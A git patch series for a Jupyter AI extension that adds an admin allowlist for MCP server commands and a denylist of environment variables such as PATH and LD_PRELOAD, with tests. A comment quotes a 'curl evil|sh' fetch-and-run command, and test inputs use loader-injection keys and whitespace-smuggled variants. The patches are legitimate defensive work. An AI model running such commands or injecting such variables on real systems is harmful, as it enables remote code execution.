+        assert patterns[0].search("uv") is not None
+
+    def test_rejects_invalid_pattern_with_helpful_message(self):
+        # Loud-fail on a typo'd regex so the admin notices before the bad
+        # policy ships to production. Silent skipping would convert the
+        # allowlist from "deny by default" to "allow everything" on syntax
+        # error, which is the opposite of what an admin enabling the gate
+        # expects.
+        with pytest.raises(ValueError, match="Invalid regex"):
+            compile_allowlist(["[", "^uv$"])
+
+
+class TestValidateCommand:
+    def test_empty_allowlist_allows_anything(self):
+        # Default state for unmodified deployments.
+        validate_mcp_stdio_command("sh", [])
+        validate_mcp_stdio_command("rm", [])
+
+    def test_matches_one_of_several_patterns(self):
+        validate_mcp_stdio_command("uv", ["^uv$", "^npx$"])
+        validate_mcp_stdio_command("npx", ["^uv$", "^npx$"])
+
+    def test_rejects_unmatched_command(self):
+        with pytest.raises(ValueError, match="not in the admin allowlist"):
+            validate_mcp_stdio_command("sh", ["^uv$", "^npx$"])
+
+    def test_rejects_shell_with_strict_pattern(self):
+        # The motivating exploit shape: command='sh', args=['-c', 'curl evil|sh'].
+        # A strict pattern set rejects the shell binary before fork.
+        with pytest.raises(ValueError):
+            validate_mcp_stdio_command("sh", ["^uv$", "^uvx$", "^npx$"])
+
+    def test_rejects_empty_or_non_string(self):
+        with pytest.raises(ValueError):
+            validate_mcp_stdio_command("", ["^uv$"])
+        with pytest.raises(ValueError):
+            validate_mcp_stdio_command(None, ["^uv$"])
+
+    def test_invalid_regex_surfaces_through_validator(self):
+        with pytest.raises(ValueError, match="Invalid regex"):
+            validate_mcp_stdio_command("uv", ["["])
+
+    def test_absolute_path_match(self):
+        # Admins often pin the full resolved path so a $PATH change cannot
+        # silently swap the binary.
+        validate_mcp_stdio_command(
+            "/usr/local/bin/uv", ["^/usr/local/bin/(uv|uvx|npx)$"]
+        )
+        with pytest.raises(ValueError):
+            validate_mcp_stdio_command(
+                "/tmp/uv", ["^/usr/local/bin/(uv|uvx|npx)$"]
+            )
+
+    def test_search_matches_anywhere_by_default(self):
+        # No anchor means substring match. Documents the default semantics
+        # so admins know they need ^ ... $ to require equality.
+        validate_mcp_stdio_command("uvtool", ["uv"])
+
+
+class TestRejectDangerousEnvKeys:
+    def test_empty_env_passes(self):
+        reject_dangerous_env_keys(None)
+        reject_dangerous_env_keys({})
+
+    @pytest.mark.parametrize(
+        "key",
+        ["PATH", "LD_PRELOAD", "LD_LIBRARY_PATH", "PYTHONPATH", "NODE_OPTIONS"],
+    )
+    def test_rejects_classic_path_bypasses(self, key):
+        with pytest.raises(ValueError, match=f"MCP env key {key!r}"):
+            reject_dangerous_env_keys({key: "/tmp/evil"})
+
+    def test_case_insensitive(self):
+        # Defense in depth: the dynamic loader honors some variants case
+        # insensitively, and admins making a typo benefit from a loud
+        # rejection on the lowercase form too.
+        with pytest.raises(ValueError):
+            reject_dangerous_env_keys({"path": "/tmp/evil"})
+
+    def test_safe_env_keys_pass(self):
+        reject_dangerous_env_keys({"API_TOKEN": "x", "REGION": "us-east-1"})
+
+    def test_dangerous_set_is_non_empty_and_includes_macos_keys(self):
+        assert "DYLD_INSERT_LIBRARIES" in DANGEROUS_MCP_ENV_KEYS
+        assert "LD_AUDIT" in DANGEROUS_MCP_ENV_KEYS

From 2d4b34be611e7952502e75d1abc7b086fde751e7 Mon Sep 17 00:00:00 2001
From: PJ Doland <pj@doland.org>
Date: Mon, 18 May 2026 07:21:36 -0400
Subject: [PATCH 2/2] review: gate mcp.json POST + close env-key whitespace
 bypass

Second-pass review surfaced two gaps:

1. ``MCPConfigFileHandler.post`` wrote the user's mcp.json to disk and
   then let ``update_mcp_servers`` log + skip rejected entries at load
   time. A rejected stdio entry would persist and re-trigger the
   warning on every restart, with the user's settings UI reporting
   {"status":"ok"} either way. Add the same allowlist + env-key
   denylist check inside the handler, return HTTP 400 with the
   policy message, and refuse the write. The Claude-mode path and
   the JSON-paste path now reject identically.

2. ``reject_dangerous_env_keys`` used a case-only comparison, so
   `" PATH"` / `"PATH\t"` would slip past while still being honored by
   downstream subprocess env handling. Normalize with strip+upper
   before comparing. New parametrized test pins the leading/trailing-
   whitespace and mixed-case variants.

Also: handler test that exercises the rejection path through the
real ``post`` function (via ``__wrapped__`` to bypass the
@authenticated decorator), confirming (a) HTTP 400 status, (b) error
message contains the policy hint, (c) nbi_config.save is NOT called.
---
 docs/admin-guide.md                         |   2 +-
 notebook_intelligence/extension.py          |  25 +++++
 notebook_intelligence/mcp_policy.py         |  13 ++-
 tests/test_mcp_manager_command_allowlist.py | 103 ++++++++++++++++++++
 tests/test_mcp_policy.py                    |  18 ++++
 5 files changed, 158 insertions(+), 3 deletions(-)

diff --git a/docs/admin-guide.md b/docs/admin-guide.md
index ac783d39..05323bc6 100644
--- a/docs/admin-guide.md
+++ b/docs/admin-guide.md
@@ -105,7 +105,7 @@ The full surface, in one table.
 | `NBI_UPLOAD_MAX_MB`                              | int  | unset                       | env (overrides traitlet)           | Same as above; env takes precedence.                                                                                                                                                                                                                                                                                                                                                                                                                                     |
 | `upload_retention_hours`                         | Int  | `24`                        | traitlet                           | How long staged uploads survive in the temp directory before the next upload sweeps them. `0` keeps only the atexit purge (uploads survive the session).                                                                                                                                                                                                                                                                                                                 |
 | `NBI_UPLOAD_RETENTION_HOURS`                     | int  | unset                       | env (overrides traitlet)           | Same as above; env takes precedence.                                                                                                                                                                                                                                                                                                                                                                                                                                     |
-| `mcp_stdio_command_allowlist`                    | List | `[]`                        | traitlet                           | Regex allowlist for the stdio MCP server `command` field. Empty list (default) means no enforcement; non-empty list rejects any stdio MCP server whose command does not match. Matched with `re.search`; anchor (`^...$`) for literal equality. Applies at both Claude `mcp add` and `mcp.json` load. See [Restricting MCP stdio commands](#restricting-mcp-stdio-commands).                                                                                              |
+| `mcp_stdio_command_allowlist`                    | List | `[]`                        | traitlet                           | Regex allowlist for the stdio MCP server `command` field. Empty list (default) means no enforcement; non-empty list rejects any stdio MCP server whose command does not match. Matched with `re.search`; anchor (`^...$`) for literal equality. Applies at both Claude `mcp add` and `mcp.json` load. See [Restricting MCP stdio commands](#restricting-mcp-stdio-commands).                                                                                             |
 | `NBI_MCP_STDIO_COMMAND_ALLOWLIST`                | csv  | unset                       | env (appends to traitlet)          | Comma-separated regex patterns added to the traitlet at startup. Per-pod additions on an org baseline.                                                                                                                                                                                                                                                                                                                                                                   |
 | `tour_config_path`                               | str  | `""`                        | traitlet                           | Filesystem path to a YAML/JSON file with admin overrides for the first-run sidebar tour copy. See [`docs/admin-tour-config.md`](admin-tour-config.md).                                                                                                                                                                                                                                                                                                                   |
 | `NBI_TOUR_CONFIG_PATH`                           | str  | unset                       | env (overrides traitlet)           | Same as above; env takes precedence.                                                                                                                                                                                                                                                                                                                                                                                                                                     |
diff --git a/notebook_intelligence/extension.py b/notebook_intelligence/extension.py
index f5af5235..44303765 100644
--- a/notebook_intelligence/extension.py
+++ b/notebook_intelligence/extension.py
@@ -49,6 +49,10 @@
     MCPConfigValidationError,
     validate_mcp_config,
 )
+from notebook_intelligence.mcp_policy import (
+    reject_dangerous_env_keys,
+    validate_mcp_stdio_command,
+)
 from notebook_intelligence.claude import ClaudeCodeChatParticipant, fetch_claude_models
 from notebook_intelligence.claude_mcp_manager import ClaudeMCPManager
 from notebook_intelligence.plugin_manager import PluginManager
@@ -725,11 +729,32 @@ def post(self):
             self.finish(json.dumps({"status": "error", "message": str(exc)}))
             return
         try:
+            # Validate stdio entries against the same admin allowlist
+            # that the in-process loader uses, so a rejected entry
+            # cannot persist to disk and re-trigger the load-time warn
+            # on every restart. Apply the same env-key denylist that
+            # blocks PATH / LD_PRELOAD / etc. bypasses.
+            allowlist = ai_service_manager.get_mcp_stdio_command_allowlist()
+            servers = data.get("mcpServers") if isinstance(data, dict) else None
+            if isinstance(servers, dict):
+                for name, server in servers.items():
+                    if not isinstance(server, dict) or "command" not in server:
+                        continue
+                    validate_mcp_stdio_command(server.get("command", ""), allowlist)
+                    reject_dangerous_env_keys(server.get("env"))
             ai_service_manager.nbi_config.user_mcp = data
             ai_service_manager.nbi_config.save()
             ai_service_manager.nbi_config.load()
             ai_service_manager.update_mcp_servers()
             self.finish(json.dumps({"status": "ok"}))
+        except ValueError as exc:
+            # Policy rejection: surface as HTTP 400 so the Settings UI
+            # shows the operator's policy message instead of a generic
+            # 500. The body still uses the {status, message} envelope
+            # the frontend already parses.
+            self.set_status(400)
+            self.finish(json.dumps({"status": "error", "message": str(exc)}))
+            return
         except Exception as e:
             self.set_status(500)
             self.finish(json.dumps({"status": "error", "message": str(e)}))
diff --git a/notebook_intelligence/mcp_policy.py b/notebook_intelligence/mcp_policy.py
index 3e5e4b83..90fa7570 100644
--- a/notebook_intelligence/mcp_policy.py
+++ b/notebook_intelligence/mcp_policy.py
@@ -102,8 +102,17 @@ def reject_dangerous_env_keys(env: Mapping[str, str] | None) -> None:
     if not env:
         return
     for key in env:
-        if isinstance(key, str) and key.upper() in DANGEROUS_MCP_ENV_KEYS:
+        if not isinstance(key, str):
+            continue
+        # Normalize before comparing: strip whitespace and uppercase, so
+        # smuggling via " PATH" / "path\t" is caught the same way as
+        # "PATH". POSIX env names are technically case-sensitive in
+        # execve, but the dynamic loader honors a few variants in
+        # surprising ways and a leading space is the simplest bypass
+        # of a case-only check.
+        normalized = key.strip().upper()
+        if normalized in DANGEROUS_MCP_ENV_KEYS:
             raise ValueError(
                 f"MCP env key {key!r} is not permitted; setting "
-                f"{key.upper()} would bypass the stdio command allowlist."
+                f"{normalized} would bypass the stdio command allowlist."
             )
diff --git a/tests/test_mcp_manager_command_allowlist.py b/tests/test_mcp_manager_command_allowlist.py
index 95e281be..3a91770b 100644
--- a/tests/test_mcp_manager_command_allowlist.py
+++ b/tests/test_mcp_manager_command_allowlist.py
@@ -136,3 +136,106 @@ def test_option_threads_to_manager_and_gates_create(self, monkeypatch):
         ) as mock_impl:
             manager.create_mcp_server("npx-server", {"command": "npx"})
         assert mock_impl.called
+
+
+class TestMCPConfigFileHandlerPreValidation:
+    """The HTTP write path (``MCPConfigFileHandler.post``) used to log
+    and skip rejected entries at load time, but persist them to disk.
+    The handler now pre-validates against the same allowlist so a
+    rejected entry returns 400 and the user's mcp.json is unchanged.
+    """
+
+    def test_rejected_entry_returns_400_and_does_not_persist(
+        self, monkeypatch, tmp_path
+    ):
+        # Mock ai_service_manager so the test can drive the handler
+        # directly without standing up a real Jupyter Server. The mock
+        # surfaces an empty allowlist by default; the test installs a
+        # strict one to trigger the rejection path.
+        from notebook_intelligence import extension as ext_module
+
+        save_called = []
+
+        class FakeConfig:
+            def __init__(self):
+                self.user_mcp = None
+
+            def save(self):
+                save_called.append(True)
+
+            def load(self):
+                pass
+
+        class FakeASM:
+            def __init__(self):
+                self.nbi_config = FakeConfig()
+
+            def get_mcp_stdio_command_allowlist(self):
+                return ["^uv$", "^uvx$"]
+
+            def update_mcp_servers(self):
+                pass
+
+        monkeypatch.setattr(ext_module, "ai_service_manager", FakeASM())
+
+        # The handler's `post` is decorated with @authenticated, but we
+        # only need to exercise the validation branch. Call the inner
+        # function with a stand-in `self`.
+        from unittest.mock import MagicMock
+
+        handler = MagicMock(spec=ext_module.MCPConfigFileHandler)
+        handler.request = MagicMock()
+        handler.request.body = (
+            b'{"mcpServers": {"evil": {"command": "sh", "args": ["-c", "x"]}}}'
+        )
+        # Run the underlying post body (skip @authenticated wrapper).
+        ext_module.MCPConfigFileHandler.post.__wrapped__(handler)
+
+        # Validation rejection: 400, error message, no save.
+        handler.set_status.assert_called_with(400)
+        finish_arg = handler.finish.call_args[0][0]
+        assert '"error"' in finish_arg
+        assert "not in the admin allowlist" in finish_arg
+        assert save_called == []
+
+    def test_dangerous_env_key_returns_400(self, monkeypatch):
+        from notebook_intelligence import extension as ext_module
+
+        save_called = []
+
+        class FakeConfig:
+            def __init__(self):
+                self.user_mcp = None
+
+            def save(self):
+                save_called.append(True)
+
+            def load(self):
+                pass
+
+        class FakeASM:
+            def __init__(self):
+                self.nbi_config = FakeConfig()
+
+            def get_mcp_stdio_command_allowlist(self):
+                return []  # permissive command list
+
+            def update_mcp_servers(self):
+                pass
+
+        monkeypatch.setattr(ext_module, "ai_service_manager", FakeASM())
+
+        from unittest.mock import MagicMock
+
+        handler = MagicMock(spec=ext_module.MCPConfigFileHandler)
+        handler.request = MagicMock()
+        # Even with an empty allowlist, a PATH-poisoning env override
+        # is always rejected.
+        handler.request.body = (
+            b'{"mcpServers": {"x": {"command": "uv", '
+            b'"env": {"PATH": "/tmp/evil"}}}}'
+        )
+        ext_module.MCPConfigFileHandler.post.__wrapped__(handler)
+
+        handler.set_status.assert_called_with(400)
+        assert save_called == []
diff --git a/tests/test_mcp_policy.py b/tests/test_mcp_policy.py
index 28f1eb12..c4574d64 100644
--- a/tests/test_mcp_policy.py
+++ b/tests/test_mcp_policy.py
@@ -106,6 +106,24 @@ def test_case_insensitive(self):
         with pytest.raises(ValueError):
             reject_dangerous_env_keys({"path": "/tmp/evil"})
 
+    @pytest.mark.parametrize(
+        "key",
+        [
+            " PATH",         # leading space
+            "PATH ",         # trailing space
+            "PATH\t",        # trailing tab
+            "\tLD_PRELOAD",  # leading tab
+            " ld_preload",   # mixed: space + case
+        ],
+    )
+    def test_whitespace_normalization(self, key):
+        # An entry whose name has surrounding whitespace would otherwise
+        # bypass a strict case-only comparison. The denylist normalizes
+        # via strip+upper before comparing, so smuggling via " PATH" or
+        # "PATH\t" is rejected the same way as "PATH".
+        with pytest.raises(ValueError):
+            reject_dangerous_env_keys({key: "/tmp/evil"})
+
     def test_safe_env_keys_pass(self):
         reject_dangerous_env_keys({"API_TOKEN": "x", "REGION": "us-east-1"})